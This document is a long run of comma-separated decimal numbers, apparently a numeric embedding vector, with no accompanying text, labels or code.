-0.017395170405507088, 0.022877637296915054, -0.022833893075585365, -0.02162366919219494, -0.004177465103566647, 0.007902918383479118, 0.05187930539250374, -0.008595517836511135, -0.001961148576810956, 0.011023258790373802, -0.024671103805303574, -0.052258413285017014, 0.012401166372001171, -0.02512311562895775, -0.006127678323537111, -0.03726911544799805, 0.003911361563950777, 0.011344041675329208, 0.023052608594298363, -0.009142306633293629, -0.022819312289357185, -0.032399050891399384, 0.0121095459908247, -0.007924790494143963, 0.045201193541288376, -0.01902824454009533, 0.016826508566737175, -0.0023001576773822308, 0.021346628665924072, 0.016112038865685463, 0.017045224085450172, 0.008114343509078026, -0.018561651930212975, 0.00433056615293026, 0.014245666563510895, 0.016520308330655098, -0.029512006789445877, -0.004286822862923145, 0.051995955407619476, -0.017599303275346756, 0.0031531478744000196, -0.022877637296915054, 0.03248653560876846, 0.0013678829418495297, -0.005719409324228764, -0.0002510671329218894, 0.022163165733218193, -0.014595611952245235, -0.01723477803170681, 0.006386491470038891, 0.034877825528383255, 0.0020085370633751154, -0.03505279868841171, 0.00777168944478035, -0.02252769283950329, -0.011453399434685707, -0.010170268826186657, 0.014216504991054535, 0.01717645488679409, -0.016855672001838684, -0.005591825116425753, 0.03557771444320679, 0.04840902239084244, 0.01159191969782114, -0.011890830472111702, -0.03166999667882919, -0.007060864008963108, -0.04388890042901039, -0.013968626968562603, -0.0347028523683548, -0.013939465396106243, -0.013917593285441399, 0.005365819204598665, -0.02244020625948906, 0.011358622461557388, -0.04887561500072479, 0.0031312762293964624, 0.012649044394493103, 0.0040061380714178085, 0.015893323346972466, 0.011650243774056435, -0.02402953803539276, -0.0138082355260849, -0.011052421294152737, 0.04578443616628647, 0.005540791433304548, -0.009995296597480774, 0.01627242937684059, -0.040943533182144165, -0.01213141717016697, -0.013932175002992153, -0.009878648445010185, 0.01733684539794922, -0.00665259500965476, 0.01794924959540367, 0.016009971499443054, -0.019290704280138016, 0.014595611952245235, 0.005646503996104002, -0.03936878219246864, -0.002201735507696867, -0.0310867577791214, 0.00663801422342658, -0.022979704663157463, -0.032165754586458206, 0.026960326358675957, 0.0013724395539611578, -0.010884739458560944, -0.0013697055401280522, -0.007487358991056681, 0.002848768839612603, -0.039922863245010376, -0.014537287876009941, 0.02147785760462284, 0.0013414548011496663, -0.022935960441827774, -0.006295360159128904, -0.007881047204136848, -0.004272242076694965, 0.005916253197938204, -0.0005563574377447367, 0.013932175002992153, 0.025648033246397972, -0.013064603321254253, -0.016811927780508995, -0.0038639730773866177, -0.013188541866838932, -0.006164130754768848, -0.0011664824560284615, -0.05333741009235382, 0.029045412316918373, 0.02239646390080452, 0.025618871673941612, -0.011963735334575176, -0.04913807287812233, -0.012853178195655346, 0.006853084545582533, 0.0112419743090868, 0.00258266506716609, 0.018445003777742386, 0.0034465910866856575, -0.01426024828106165, -0.014617483131587505, -0.012357423081994057, 0.015382987447082996, 0.02770395763218403, 0.013640553690493107, 0.006171421147882938, 0.02755814790725708, 0.019436514005064964, -0.0019410996465012431, -0.006397427059710026, -0.009193339385092258, -0.023883728310465813, -0.009193339385092258, -0.015951648354530334, 0.02417534962296486, -0.03254485875368118, 0.0085663553327322, -0.004654994234442711, 0.021011264994740486, -0.014930975623428822, 0.040068671107292175, -0.0005600026925094426, 0.02577926218509674, 0.024394063279032707, -0.03105759434401989, -0.012240774929523468, 0.0004353804688435048, 0.02766021527349949, 0.00140524678863585, 0.006083935033529997, -0.03689000755548477, 0.04724254086613655, -0.014019660651683807, 0.03689000755548477, -0.02314009517431259, 0.016578631475567818, 0.032224077731370926, -0.010651443153619766, -0.013560358434915543, 0.054649703204631805, 0.012554267421364784, -0.0081872483715415, -0.01071705762296915, -0.020850874483585358, -0.011504433117806911, -0.03525693342089653, 0.024758590385317802, -0.021798640489578247, 0.011686695739626884, 0.0009350085747428238, 0.014894522726535797, -0.0005249170935712755, 0.03432374447584152, 0.019611485302448273, 0.022586015984416008, -0.016374496743083, -0.01710354909300804, -0.00249153352342546, 0.03814397752285004, -0.046834271401166916, 0.007873756811022758, 0.01710354909300804, 0.02238188125193119, -0.0077571081928908825, -0.01971355266869068, 0.02846217155456543, 0.0025316313840448856, 0.034877825528383255, -0.016097458079457283, 0.0008552685612812638, -0.039922863245010376, -0.011118035763502121, -0.018780367448925972, -0.020063498988747597, 0.015003880485892296, 0.007221255451440811, 0.01809505932033062, -0.04289739206433296, 0.016782766208052635, -0.008121633902192116, -0.02919122390449047, -0.031553350389003754, -0.02311093360185623, 0.014639354310929775, -0.011577337980270386, -0.0017169163329526782, 0.00690411776304245, -0.0020012464374303818, -0.012415747158229351, 0.028039321303367615, 0.02672702819108963, 0.012262647040188313, 0.03271983191370964, -0.0069806682877242565, -0.0020048916339874268, -0.005420498084276915, -0.029599491506814957, -0.027383174747228622, -0.03271983191370964, 0.02416076697409153, 0.034877825528383255, -0.013691587373614311, -0.02063215896487236, -0.0005823299288749695, 0.0026665059849619865, 0.020136402919888496, -0.010862867347896099, -0.02236730046570301, -0.01506220456212759, -0.00983490515500307, -0.03549022972583771, -0.0009823968866840005, -0.026129206642508507, -0.025298088788986206, 0.0036270313430577517, -0.01644740253686905, -0.03184496983885765, 0.008303896524012089, 0.032748993486166, 0.0018736624624580145, 0.006422943901270628, 0.01891159638762474, -0.042693257331848145, -0.005281978286802769, -0.04021448269486427, -0.011460689827799797, -0.023737918585538864, -0.038173139095306396, -0.01723477803170681, 0.04193504527211189, 0.017774276435375214, 0.0005718498141504824, 0.031232567504048347, 0.028010159730911255, -0.013502034358680248, -0.02162366919219494, -0.034032125025987625, 0.011934573762118816, -0.004676865413784981, -0.02252769283950329, -0.03639425337314606, -0.03525693342089653, -0.024671103805303574, 0.029162060469388962, 0.008945462293922901, 0.029541168361902237, 0.04420968517661095, 0.010534795001149178, -0.022673502564430237, 0.010082782246172428, -0.0056829568929970264, 0.00944850780069828, -0.019334446638822556, -0.002579019870609045, 0.031232567504048347, 0.011708567850291729, 0.01896992139518261, -0.013538487255573273, 0.0467759445309639, 0.0009659932693466544, 0.03292396664619446, -0.007472778204828501, 0.006867665331810713, -0.008996495977044106, -0.019261540845036507, 0.013815526850521564, 0.021973613649606705, 0.011176359839737415, 0.001144610927440226, -0.0037272758781909943, -0.00853719376027584, 0.016768185421824455, -0.004068107344210148, -0.011825216002762318, -0.013465581461787224, -0.01726393960416317, -0.04371393099427223, -0.03534441813826561, -0.02857881970703602, -0.020282212644815445, -0.010235883295536041, 0.004702382255345583, -0.03683168441057205, -0.00906211044639349, 0.0033809763845056295, 0.0009823968866840005, 0.0015173384454101324, -0.02063215896487236, -0.04205169156193733, -0.010921192355453968, 0.008209120482206345, -0.0008261065231636167, 0.015689188614487648, -0.01974271610379219, 0.023038027808070183, -0.00853719376027584, 0.008048729039728642, -0.00048436361248604953, -0.006623432971537113, 0.020355118438601494, -0.004895580932497978, -0.017818018794059753, -0.020238470286130905, -0.003191423136740923, 0.03980621322989464, -0.028010159730911255, 0.011278427205979824, -0.019188636913895607, -0.025298088788986206, 0.0023001576773822308, -0.021375790238380432, 0.00021108319924678653, 0.012824016623198986, -0.015208015218377113, -0.00984219554811716, 0.005701182875782251, 0.010396274738013744, 0.010009877383708954, -0.0010525682009756565, 0.0008261065231636167, -0.015966229140758514, -0.011314880102872849, 0.0013824639609083533, 0.008289315737783909, -0.018634557723999023, 0.0007673267391510308, -0.014340443536639214, -0.015193433500826359, -0.0023767079692333937, 0.007516521494835615, -0.008610098622739315, 0.003665306605398655, -0.029745303094387054, 0.018576232716441154, 0.017540980130434036, -0.003309893887490034, -0.003523141611367464, -0.0155433788895607, -0.028812116011977196, -0.03359469398856163, -0.00944850780069828, -0.018678300082683563, -0.0024860657285898924, 0.0018900660797953606, 0.025385573506355286, 0.018692880868911743, 0.036715034395456314, -0.03341972082853317, -0.015135109424591064, -0.006459396332502365, -0.00035518480581231415, 0.01891159638762474, -0.002728475257754326, 0.007873756811022758, -0.0037363891024142504, 0.005930833984166384, 0.007213965058326721, 0.012386585585772991, -0.021055007353425026, 0.0012922438327223063, -0.004727899096906185, -0.022906798869371414, 0.005788668990135193, 0.007068154402077198, 0.012692786753177643, -0.03782319277524948, 0.012969826348125935, 0.007184803020209074, 0.008938171900808811, 0.012612591497600079, -0.013735330663621426, 0.0025079373735934496, 0.009244373068213463, -0.014121728017926216, -0.022863056510686874, 0.014056113548576832, -0.046076055616140366, -0.00816537719219923, 0.022775569930672646, 0.027951836585998535, 0.013582229614257812, -0.0013861092738807201, 0.008456997573375702, -0.016549469903111458, -0.01159921009093523, -0.007662331685423851, -0.02338797226548195, -0.013720749877393246, -0.015762094408273697, 0.03633592650294304, 0.0071519953198730946, 0.03201994299888611, -0.024408645927906036, 0.02592507191002369, -0.015587122179567814, -0.018430422991514206, -0.011453399434685707, 0.023475458845496178, -0.003453881712630391, 0.00985677633434534, -0.02662496268749237, -0.004545636475086212, -0.02229439653456211, -0.0032424565870314837, -0.00008224612247431651, -0.019567742943763733, 0.005981867667287588, -0.01379365473985672, 0.011263846419751644, 0.002296512247994542, -0.01803673431277275, 0.0077643985860049725, -0.028957927599549294, 0.010899320244789124, -0.014114437624812126, 0.016534889116883278, -0.010884739458560944, -0.0015583476051688194, -0.012080383487045765, 0.005205427762120962, -0.007953952066600323, 0.009251663461327553, 0.007691493723541498, -0.017016062512993813, 0.01822628825902939, -0.03018273413181305, 0.0009067578357644379, -0.010651443153619766, -0.017584722489118576, -0.016039133071899414, -0.012816726230084896, -0.014894522726535797, -0.014340443536639214, 0.007137414533644915, -0.0057339901104569435, 0.01904282532632351, 0.08398673683404922, 0.0031021141912788153, -0.04581359773874283, -0.016811927780508995, 0.0007609475287608802, 0.011190940625965595, -0.0014189165085554123, -0.02395663410425186, 0.0004039401246700436, 0.004556572064757347, 0.002983643440529704, -0.001842677709646523, 0.006663531064987183, 0.03105759434401989, 0.016024552285671234, -0.005916253197938204, 0.026362502947449684, -0.010060911066830158, 0.0171327106654644, -0.010002586990594864, -0.008223701268434525, 0.020253051072359085, -0.013108346611261368, -0.032340724021196365, 0.015178852714598179, -0.01379365473985672, -0.004024364519864321, 0.002260059816762805, -0.016199525445699692, -0.0008274734718725085, -0.018561651930212975, 0.0002736221649684012, -0.02408786304295063, -0.025283506140112877, -0.010870158672332764, -0.027951836585998535, 0.024612778797745705, -0.02245478704571724, -0.0006356418016366661, -0.015907904133200645, -0.006864020135253668, 0.0011382317170500755, -0.004428987856954336, 0.0014699501916766167, -0.024423226714134216, -0.014712260104715824, 0.009565155953168869, 0.03814397752285004, 0.006003739312291145, 0.0007832747651264071, 0.023417135700583458, -0.0173514261841774, 0.04015615954995155, 0.04665929824113846, 0.010155688039958477, 0.017686789855360985, 0.012328261509537697, 0.0128677599132061, -0.013144799508154392, -0.0028870441019535065, 0.00869029387831688, 0.021142493933439255, 0.016753604635596275, 0.02507937327027321, 0.027324851602315903, -0.002234542975202203, -0.022965123876929283, -0.013152089901268482, -0.005467886570841074, 0.010068201459944248, 0.016564050689339638, 0.018605394288897514, 0.03015357069671154, -0.006597916129976511, 0.008376802317798138, 0.0019228734308853745, 0.010097363963723183, 0.024656523019075394, 0.003147680079564452, -0.009178758598864079, 0.0062005831860005856, 0.03015357069671154, -0.000555901788175106, 0.020253051072359085, -0.02162366919219494, 0.0032424565870314837, -0.006277133710682392, -0.029074575752019882, 0.0063245221972465515, -0.014719550497829914, -0.005311140324920416, -0.0072795795276761055, 0.019596904516220093, 0.010892029851675034, -0.012656334787607193, 0.004567507654428482, -0.019451094791293144, 0.0022454787977039814, -0.0163015928119421, -0.030503515154123306, 0.01904282532632351, -0.011096164584159851, -0.014719550497829914, -0.021055007353425026, -0.02655205689370632, 0.010928482748568058, 0.012248065322637558, 0.012940664775669575, 0.019626067951321602, 0.00945579819381237, 0.014376896433532238, -0.013458291068673134, -0.01031607948243618, -0.026872839778661728, -0.0009687272249720991, -0.016753604635596275, 0.015310082584619522, 0.030736813321709633, -0.005413207691162825, -0.008405963890254498, -0.020384280011057854, -0.016578631475567818, 0.010542085394263268, -0.021302886307239532, 0.00041419241460971534, 0.05080031231045723, -0.03379882872104645, -0.002635521348565817, 0.015412149019539356, 0.023796241730451584, 0.020938359200954437, 0.002418628428131342, -0.02230897732079029, -0.009164177812635899, 0.024583617225289345, -0.0041410126723349094, 0.040126997977495193, 0.016855672001838684, -0.016870252788066864, 0.025298088788986206, -0.016811927780508995, 0.01799299195408821, -0.01883869245648384, 0.0026373439468443394, 0.0047862231731414795, -0.010111944749951363, -0.013363514095544815, 0.0007008007960394025, 0.014974717982113361, 0.009317278861999512, -0.015864161774516106, -0.04907974973320961, 0.011511723510921001, -0.005996448919177055, 0.003466640133410692, 0.010192140005528927, 0.012248065322637558, -0.044530466198921204, 0.008792361244559288, 0.01978645846247673, 0.009484960697591305, -0.0065067848190665245, 0.02076338790357113, -0.022688083350658417, -0.022877637296915054, -0.007720655761659145, 0.03624844178557396, -0.007895627990365028, -0.0010124703403562307, -0.015980809926986694, 0.006521366070955992, -0.00331900711171329, -0.022790150716900826, 0.0008516233065165579, 0.01380094513297081, 0.01994684897363186, -0.014704969711601734, 0.011570047587156296, 0.027193622663617134, -0.00515803974121809, 0.0022381881717592478, 0.0196989718824625, 0.00688953697681427, -0.012299099005758762, 0.0026829096022993326, -0.017818018794059753, -0.00644846074283123, -0.009120434522628784, -0.014719550497829914, 0.005741280969232321, 0.008318478241562843, 0.05505797266960144, 0.017657628282904625, -0.013866560533642769, 0.013822817243635654, 0.013451000675559044, -0.0021361210383474827, -0.010068201459944248, -0.016739023849368095, -0.0046003153547644615, 0.014923685230314732, 0.011285717599093914, -0.0036270313430577517, 0.017861763015389442, 0.021944450214505196, -0.0242190919816494, -0.04899226129055023, -0.004100915044546127, -0.01074621919542551, 0.008996495977044106, 0.008128924295306206, 0.008930881507694721, -0.0008475224021822214, 0.015864161774516106, -0.0013223171699792147, 0.0032588604371994734, -0.03181580826640129, 0.01083370577543974, 0.000633363495580852, -0.01794924959540367, -0.010228592902421951, 0.008354930207133293, 0.014486254192888737, -0.009375602938234806, -0.007596716750413179, 0.004038945306092501, 0.012634462676942348, -0.0004994003102183342, 0.0006962441839277744, -0.0038129393942654133, -0.013232285156846046, -0.008996495977044106, -0.013706169091165066, 0.021813221275806427, 0.0004957550554536283, -0.012568848207592964, 0.030357705429196358, -0.007881047204136848, 0.02677077241241932, 0.005303849931806326, 0.0052564614452421665, -0.00908398162573576, -0.023723335936665535, 0.01821170747280121, 0.034790340811014175, -0.00019217342196498066, -0.004472731146961451, 0.01201476901769638, -0.03024105727672577, 0.01200747862458229, 0.0014161826111376286, 0.005584534723311663, -0.009207921102643013, 0.0025644388515502214, 0.008099762722849846, 0.013997789472341537, 0.010286916978657246, -0.0015091366367414594, -0.007713365368545055, -0.029570329934358597, 0.00985677633434534, -0.017482655122876167, -0.0036416123621165752, 0.011416946537792683, -0.0008365866378881037, 0.010775381699204445, -0.012969826348125935, -0.005580889526754618, -0.010695185512304306, -0.029570329934358597, -0.005176265724003315, 0.02144869603216648, -0.013210413977503777, -0.007487358991056681, -0.007316031958907843, 0.0015948002692312002, -0.0014234731206670403, 0.02502104826271534, -0.018313774839043617, 0.010002586990594864, 0.012386585585772991, 0.02404411882162094, 0.005023165140300989, -0.01895534060895443, -0.010432727634906769, -0.0049101621843874454, -0.010286916978657246, -0.01542673073709011, -0.014632063917815685, 0.009550575166940689, -0.005792314186692238, -0.004654994234442711, -0.008107053115963936, -0.01163566205650568, 0.010279626585543156, -0.0016986901173368096, -0.013640553690493107, 0.012051221914589405, 0.01640366017818451, 0.0034793983213603497, -0.002055925317108631, 0.02486065775156021, 0.012065802700817585, -0.014879941940307617, -0.021929869428277016, -0.012772982940077782, -0.019203217700123787, -0.015689188614487648, 0.011103454977273941, -0.005183556582778692, -0.02484607696533203, -0.01724935881793499, -0.015893323346972466, -0.00022862599871587008, 0.01714729145169258, -0.0031112274155020714, -0.002921673934906721, 0.011577337980270386, 0.0011200053850188851, 0.0005805072723887861, 0.007264998275786638, -0.002280108630657196, -0.00541685288771987, 0.014712260104715824, -0.0044836667366325855, 0.01330519001930952, -0.004516474436968565, 0.016024552285671234, -0.001037987065501511, 0.007254062686115503, 0.023883728310465813, 0.04103102162480354, 0.010461889207363129, 0.011285717599093914, 0.006557818502187729, -0.010243173688650131, -0.0028250745963305235, -0.00044449360575526953, -0.019217798486351967, -0.0035322546027600765, 0.01290421187877655, 0.015776675194501877, 0.014807036146521568, 0.00946308858692646, -0.005825121887028217, -0.05062533915042877, -0.010228592902421951, -0.01162837166339159, -0.0129771176725626, -0.02245478704571724, -0.02076338790357113, 0.015105947852134705, -0.005292913876473904, 0.009237082675099373, 0.021346628665924072, 0.003772841766476631, -0.010017167776823044, 0.023548364639282227, -0.004899226129055023, -0.04578443616628647, 0.008354930207133293, -0.012204322963953018, 0.0010899320477619767, -0.018415842205286026, 0.0030456127133220434, -0.002753992099314928, 0.015339244157075882, -0.001181063475087285, -0.006696338299661875, 0.0017251181416213512, 0.003198713529855013, 0.0016904881922528148, -0.018532490357756615, 0.0005030455649830401, 0.0112419743090868, 0.003105759620666504, 0.015397568233311176, 0.001961148576810956, -0.022236071527004242, -0.0034684627316892147, 0.020136402919888496, -0.03642341494560242, -0.01710354909300804, -0.002856059465557337, -0.009630770422518253, -0.0005777733167633414, -0.00732332281768322, 0.00008879620145307854, -0.02152160182595253, -0.009237082675099373, 0.04298487678170204, 0.0022381881717592478, 0.00009950414096238092, 0.010585827752947807, -0.0030383223202079535, -0.014107147231698036, -0.007655041292309761, 0.013655135408043861, -0.0013879318721592426, -0.01649114489555359, 0.000553623482119292, 0.01994684897363186, 0.012824016623198986, 0.018532490357756615, 0.0009541462059132755, 0.017045224085450172, -0.009477670304477215, -0.0006219720817171037, 0.02486065775156021, -0.005420498084276915, 0.028739212080836296, 0.002967239823192358, 0.011956444941461086, -0.015732932835817337, 0.010607699863612652, -0.007888337597250938, 0.01883869245648384, 0.029468262568116188, 0.002677441807463765, 0.004760706331580877, -0.009222501888871193, -0.005314785521477461, -0.015499635599553585, -0.03872721642255783, -0.001258525182493031, -0.00644846074283123, -0.0057339901104569435, -0.012320971116423607, -0.013224994763731956, 0.013844688422977924, -0.01159191969782114, 0.02319842018187046, 0.012357423081994057, -0.021157074719667435, 0.002467839512974024, -0.007895627990365028, -0.009339150041341782, 0.0034046706277877092, 0.01796383038163185, 0.013480163179337978, -0.00855906493961811, -0.011949154548346996, -0.013975918292999268, -0.013487453572452068, -0.0004383422201499343, -0.001964793773368001, 0.0010306965559720993, 0.008515321649610996, 0.006783824414014816, -0.024437807500362396, 0.02593965269625187, -0.014041532762348652, 0.011657534167170525, -0.004640412982553244, -0.0077498177997767925, -0.025545965880155563, 0.0023839985951781273, 0.006659885868430138, -0.020165564492344856, -0.009324569255113602, 0.012598010711371899, -0.018342936411499977, 0.004458149895071983, 0.008405963890254498, 0.02596881613135338, 0.01722019724547863, -0.014581030234694481, -0.0066307238303124905, -0.0042831776663661, -0.022804731503129005, 0.01988852582871914, 0.007381646893918514, -0.02162366919219494, -0.022571435198187828, 0.004738835152238607, -0.010571246966719627, 0.003493979573249817, -0.014734131284058094, 0.029132898896932602, 0.013625972904264927, 0.006422943901270628, 0.018605394288897514, -0.016724441200494766, -0.0030747747514396906, -0.007046283222734928, 0.02494814246892929, 0.007647750433534384, 0.011118035763502121, 0.005927188787609339, -0.010775381699204445, 0.00643387995660305, -0.006561463698744774, -0.007859175093472004, 0.01415089052170515, -0.007465487811714411, 0.011723148636519909, 0.003466640133410692, 0.02153618261218071, 0.015762094408273697, 0.0063245221972465515, 0.006353684235364199, 0.0057303449138998985, -0.006386491470038891, -0.019611485302448273, 0.012145998887717724, 0.0027394110802561045, 0.005026810336858034, 0.0022983348462730646, 0.006357329431921244, -0.010184849612414837, 0.0022983348462730646, -0.010009877383708954, 0.013961336575448513, 0.008201830089092255, 0.028228875249624252, 0.022075681015849113, -0.01503304298967123, -0.004213918000459671, -0.009222501888871193, 0.002272818237543106, 0.010133815929293633, -0.0011345864040777087, -0.012452200055122375, -0.011577337980270386, -0.004243080038577318, 0.006058418191969395, -0.00007484169327653944, -0.0012366536539047956, 0.004593024495989084, 0.005872509907931089, 0.008515321649610996, -0.012627172283828259, 0.008296606130897999, -0.017715951427817345, 0.01464664563536644, -0.0005189935327507555, 0.022848475724458694, 0.017759695649147034, -0.017540980130434036, 0.0022618824150413275, -0.009769290685653687, -0.0047898683696985245, 0.01711812987923622, 0.016811927780508995, -0.0030456127133220434, 0.007319677155464888, 0.002243656199425459, 0.017453493550419807, -0.01033066026866436, 0.01197831705212593, 0.00819453876465559, -0.014828908257186413, -0.025677194818854332, -0.01621410623192787, -0.0071009621024131775, 0.000037136062019271776, -0.011854377575218678, -0.007990404963493347, -0.012379295192658901, 0.009813033975660801, 0.009645352140069008, 0.009368312545120716, 0.01198560744524002, 0.0019921332132071257, -0.009594318456947803, -0.009915100410580635, 0.011672114953398705, -0.006517720874398947, 0.002573551842942834, -0.0055444370955228806, 0.014799745753407478, -0.001500023528933525, 0.01071705762296915, -0.008500740863382816, -0.005905317608267069, -0.01081912498921156, 0.010542085394263268, -0.000972372479736805, 0.028739212080836296, -0.010964934714138508, -0.0003123530186712742, -0.004516474436968565, -0.009477670304477215, -0.017847182229161263, -0.02846217155456543, -0.004370663780719042, -0.007341548800468445, 0.006262552458792925, 0.0036634840071201324, -0.006419298704713583, -0.0035541262477636337, -0.011110745370388031, -0.02593965269625187, -0.019086569547653198, -0.02251311205327511, -0.003355459775775671, -0.012189741246402264, 0.004523764830082655, 0.013195832259953022, -0.0031021141912788153, -0.015091367065906525, 0.02917664311826229, 0.008413254283368587, 0.010476470924913883, -0.0057230545207858086, 0.004512828774750233, 0.013531196862459183, -0.026100045070052147, -0.012736530043184757, -0.00018066808115690947, -0.003185955109074712, -0.00473154429346323, -0.007192093413323164, 0.00941934622824192, -0.013640553690493107, -0.00904752966016531, 0.02405869960784912, 0.011460689827799797, -0.0062443264760077, 0.0004866418894380331, 0.0121095459908247, -0.017701370641589165, -0.004549281671643257, -0.01902824454009533, -0.022935960441827774, 0.008442416787147522, 0.0013050022535026073, -0.01977187767624855, 0.002227252349257469, 0.002128830412402749, 0.02230897732079029, 0.0022582372184842825, 0.0018071364611387253, -0.007308741565793753, -0.019421933218836784, 0.014486254192888737, 0.0035650620702654123, -0.0008447884465567768, -0.007075445260852575, 0.0028305426239967346, 0.01504762377589941, -0.007669622078537941, -0.010549375787377357, -0.00407175300642848, -0.000015535062630078755, -0.01708896830677986, 0.034032125025987625, 0.005785023793578148, 0.003082065377384424, 0.021200818940997124, -0.002174396300688386, 0.022075681015849113, -0.0055699534714221954, -0.009528703056275845, 0.011008678004145622, -0.030532678589224815, 0.02398579567670822, 0.0047825779765844345, -0.011941864155232906, -0.004804449621587992, -0.00013441887858789414, 0.01330519001930952, 0.010789962485432625, 0.003504915162920952, -0.0035650620702654123, -0.0025462124031037092, -0.008734037168323994, 0.019261540845036507, 0.00947037898004055, -0.0038384562358260155, -0.022965123876929283, 0.00024400443362537771, -0.004844547249376774, -0.017438912764191628, -0.016972320154309273, 0.006153194699436426, 0.005055972374975681, -0.007472778204828501, -0.014807036146521568, -0.001552879810333252, -0.007567554712295532, -0.018284613266587257, 0.019319865852594376, -0.013348933309316635, -0.0018654606537893414, -0.020267631858587265, -0.006481267977505922, -0.00491380738094449, -0.00004946728586219251, -0.025312669575214386, -0.004199336748570204, 0.005781378597021103, 0.00945579819381237, 0.005741280969232321, -0.021186238154768944, -0.059082336723804474, 0.015237176790833473, 0.00644846074283123, -0.005114296451210976, -0.012838597409427166, 0.01733684539794922, 0.0065031396225094795, -0.011723148636519909, 0.01631617359817028, -0.006608852185308933, -0.022571435198187828, -0.0032789092510938644, -0.007837303914129734, -0.019421933218836784, -0.017482655122876167, 0.018313774839043617, -0.011774182319641113, -0.012765692546963692, 0.006401072256267071, -0.01965522952377796, -0.0090548200532794, 0.002659215359017253, -0.006918699014931917, 0.030824298039078712, 0.011963735334575176, 0.0028669950552284718, -0.001442610751837492, -0.0005978222470730543, -0.0030547259375452995, -0.01427482906728983, -0.010192140005528927, 0.025429317727684975, -0.012043931521475315, -0.02771853841841221, -0.0005404094699770212, 0.01251052413135767, 0.00433056615293026, -0.0015218950575217605, 0.014041532762348652, -0.000026356921807746403, -0.0009459443390369415, -0.011941864155232906, -0.02919122390449047, -0.011037840507924557, -0.005646503996104002, 0.01729310303926468, 0.008077890612185001, 0.009907810017466545, -0.0015064027393236756, -0.00039801656384952366, -0.015091367065906525, 0.0038821992930024862, -0.011365913785994053, -0.0035942241083830595, 0.005690247286111116, -0.019538581371307373, 0.003780132159590721, 0.02321300096809864, 0.0030747747514396906, 0.007203029002994299, 0.013079184107482433, -0.012583428993821144, 0.0036197409499436617, 0.013662425801157951, 0.008063309825956821, -0.006667176261544228, -0.005336657166481018, -0.01428211946040392, -0.028695467859506607, 0.005529855843633413, -0.00011801521759480238, -0.002137943636626005, -0.013334352523088455, -0.009222501888871193, -0.011752310208976269, 0.01427482906728983, 0.01625784859061241, 0.02491898089647293, 0.016739023849368095, 0.010855576954782009, 0.0035541262477636337, 0.01547047309577465, -0.005216363817453384, 0.008376802317798138, -0.00249153352342546, -0.0016112038865685463, -0.002786799566820264, -0.02579384297132492, -0.0033700407948344946, 0.001455369172617793, -0.0036890008486807346, -0.008034148253500462, -0.0030747747514396906, 0.021711153909564018, -0.01288234069943428, -0.0056209871545434, 0.011373204179108143, 0.002733943285420537, -0.019217798486351967, -0.006751017179340124, 0.0014681274769827724, -0.016199525445699692, 0.029526587575674057, 0.00817995797842741, -0.016680698841810226, -0.002520695561543107, -0.00560640636831522, 0.02401495724916458, 0.0006625255919061601, -0.0005800516228191555, 0.0011090696789324284, -0.007305096369236708, 0.020384280011057854, 0.003125808434560895, -0.019217798486351967, 0.0022618824150413275, 0.014223795384168625, 0.005661085247993469, -0.006987959146499634, -0.014763293787837029, -0.0000808791519375518, -0.00026018026983365417, -0.0012029350036755204, 0.01638907752931118, 0.0005021342658437788, 0.001414360012859106, -0.0005846081767231226, 0.02328590676188469, -0.021142493933439255, -0.013108346611261368, -0.029686978086829185, 0.005664730444550514, -0.00941934622824192, -0.008508031256496906, 0.0003296679933555424, -0.02055925317108631, 0.00046180858043953776, -0.02408786304295063, -0.018707461655139923, -0.008354930207133293, -0.008223701268434525, 0.0035450130235403776, -0.004516474436968565, -0.00777168944478035, 0.034790340811014175, 0.0042977589182555676, -0.003379153786227107, -0.005737635772675276, -0.0028633498586714268, 0.003925942350178957, 0.0015957115683704615, -0.007793561089783907, -0.013013569638133049, 0.004042590502649546, -0.026449989527463913, -0.017730534076690674, 0.006375555414706469, -0.001291332533583045, -0.011956444941461086, 0.016870252788066864, 0.0038749088998883963, -0.026129206642508507, 0.017920086160302162, -0.008405963890254498, -0.0008484337013214827, 0.015105947852134705, 0.001523717655800283, -0.006262552458792925, -0.01808047853410244, -0.00035928571014665067, 0.0015701947268098593, 0.010695185512304306, -0.007410808932036161, -0.018342936411499977, -0.016913995146751404, 0.009361021220684052, 0.009667223319411278, 0.009557865560054779, 0.02147785760462284, 0.010906610637903214, 0.0058542839251458645, -0.002655570162460208, -0.0006561463815160096, -0.03948543220758438, -0.0052491710521280766, 0.03432374447584152, 0.003060193732380867, 0.02843300998210907, -0.01722019724547863, -0.00985677633434534, 0.016636956483125687, 0.0026883776299655437, 0.013071893714368343, -0.004210272803902626, -0.00947037898004055, -0.011868959292769432, 0.04403471201658249, 0.0007901095668785274, 0.008486160077154636, 0.020428024232387543, -0.0020777969621121883, -0.003497624769806862, 0.0016121151857078075, -0.005292913876473904, -0.0035468356218189, 0.008741327561438084, -0.003395557403564453, 0.0020613931119441986, 0.010119235143065453, 0.014989299699664116, -0.007487358991056681, -0.010527503676712513, -0.016636956483125687, 0.006189647596329451, 0.02410244382917881, 0.003608805127441883, 0.012619881890714169, 0.0009432104416191578, -0.01031607948243618, 0.04324733838438988, -0.008595517836511135, -0.02420451119542122, -0.020034335553646088, -0.010177559219300747, 0.01288234069943428, 0.013647845014929771, 0.009783871471881866, -0.007217610254883766, -0.004192046355456114, 0.01974271610379219, -0.017832599580287933, -0.010644152760505676, -0.00579595984891057, -0.002914383541792631, -0.005176265724003315, -0.009142306633293629, -0.01329789962619543, 0.015208015218377113, 0.0037691963370889425, -0.004206627141684294, 0.007126478478312492, -0.022265233099460602, -0.012357423081994057, 0.002733943285420537, -0.010921192355453968, 0.01341454777866602, 0.0015419439878314734, -0.01504762377589941, -0.008114343509078026, 0.013589520938694477, -0.019553162157535553, 0.0065031396225094795, 0.023694174364209175, -0.0005973665975034237, 0.015937065705657005, -0.0031075822189450264, -0.003849392058327794, 0.0199176874011755, 0.006521366070955992, -0.016884833574295044, 0.014406058005988598, -0.009565155953168869, 0.005446014925837517, 0.020369699224829674, -0.019407352432608604, -0.024291997775435448, -0.008960043080151081, 0.024437807500362396, 0.02424825355410576, 0.00855177454650402, 0.0063281673938035965, -0.008734037168323994, 0.01250323373824358, -0.0075748455710709095, 0.003065661760047078, 0.008347639814019203, -0.01707438752055168, 0.0019228734308853745, 0.00581783102825284, 0.01646198332309723, -0.00018078199354931712, -0.000017656717318459414, 0.02147785760462284, 0.014362314715981483, 0.004859128501266241, 0.009368312545120716, 0.0099223917350173, -0.018824109807610512, 0.011963735334575176, -0.02053009159862995, -0.020005173981189728, -0.01414360012859106, 0.013246865943074226, 0.020296795293688774, 0.001532830880023539, -0.014303990639746189, -0.01427482906728983, 0.022221490740776062, -0.0006206051330082119, 0.001217516022734344, -0.007983114570379257, 0.02410244382917881, 0.006215164437890053, 